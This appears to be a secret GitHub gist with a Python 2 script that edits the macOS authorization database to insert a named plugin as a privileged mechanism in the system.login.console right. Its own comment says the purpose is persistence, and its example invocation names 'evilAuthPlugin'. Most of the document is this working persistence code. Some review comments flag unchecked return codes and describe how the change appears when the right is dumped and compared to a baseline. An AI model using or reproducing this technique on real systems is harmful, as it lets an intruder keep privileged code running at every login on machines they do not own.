/installplugin.py Secret
Last active
October 14, 2018 15:12
python script to install authorization plugin that requests system.login.console right
#!/usr/bin/python
# install authorization plugin for persistence.
# original script here: https://github.com/chilcote/pylab/blob/070c328bc4929e7e7042f6bd1e42d2700abb05e4/auth_db.py
# system.login.console right should be used for auth plugins
# ex: installplugin.py evilAuthPlugin
import sys
import objc
from ctypes import CDLL, c_void_p, byref, c_char_p
from ctypes.util import find_library
from PyObjCTools import Conversion

# Load Security.framework through ctypes and bind the three Authorization
# Services entry points this script calls.
# NOTE(review): no argtypes/restype are declared on these functions, so
# ctypes falls back to its default argument conversions and an int return
# type for every call made through them.
Security = CDLL(find_library("Security.framework"))
AuthorizationCreate = Security.AuthorizationCreate
AuthorizationRightGet = Security.AuthorizationRightGet
AuthorizationRightSet = Security.AuthorizationRightSet
def authorization_right_get(right):
    """Read the authorization database entry for *right*.

    Calls AuthorizationRightGet with an output pointer. When the pointer has
    been filled in, the referenced Objective-C object is wrapped and a
    mutable copy of it is returned; otherwise the result is None.
    """
    right_definition = c_void_p()
    # NOTE(review): the status code returned by AuthorizationRightGet is
    # discarded; only the output pointer decides what is returned.
    AuthorizationRightGet(right, byref(right_definition))
    if not right_definition:
        return None
    wrapped = objc.objc_object(c_void_p=right_definition)
    return wrapped.mutableCopy()
def authorization_right_set(right, value):
    """Write *value* as the authorization database entry for *right*.

    Creates an authorization reference with AuthorizationCreate, then hands
    it to AuthorizationRightSet together with the raw pointer behind
    *value*. Returns whatever AuthorizationRightSet returns.
    """
    authorization = c_void_p()
    # NOTE(review): the status of AuthorizationCreate is not checked before
    # the reference is used.
    AuthorizationCreate(None, None, 0, byref(authorization))
    raw_definition = value.__c_void_p__()
    status = AuthorizationRightSet(
        authorization, right, raw_definition, None, None, None
    )
    return status
if __name__ == '__main__':
    # Python 2 script (print statements). Expects one argument: the plugin
    # bundle name without its extension.
    if len(sys.argv) < 2:
        print "Please provide the bundle name, without the extension"
        sys.exit(0)

    plugin_name = sys.argv[1]
    target_right = "system.login.console"

    # Read the current definition of the login right and find the
    # "HomeDirMechanism:status" entry in its ordered mechanisms list.
    current_entry = authorization_right_get(target_right)
    anchor = current_entry["mechanisms"].index("HomeDirMechanism:status")
    new_mechanism = u"{}:login,privileged".format(plugin_name)

    # The pyobjc object is converted to a plain Python collection so the
    # mechanisms list can be edited, then converted back to a property list.
    editable_entry = Conversion.pythonCollectionFromPropertyList(
        current_entry, conversionHelper=None
    )
    editable_entry['mechanisms'].insert(anchor + 1, new_mechanism)
    updated_entry = Conversion.propertyListFromPythonCollection(
        editable_entry, conversionHelper=None
    )

    # Write the modified right back to the authorization database. The
    # change is visible afterwards as an extra "<name>:login,privileged"
    # entry in the mechanisms list of system.login.console, e.g. when the
    # right is dumped with `security authorizationdb read system.login.console`
    # and compared against a known-good baseline.
    authorization_right_set(target_right, updated_entry)
    print "Done"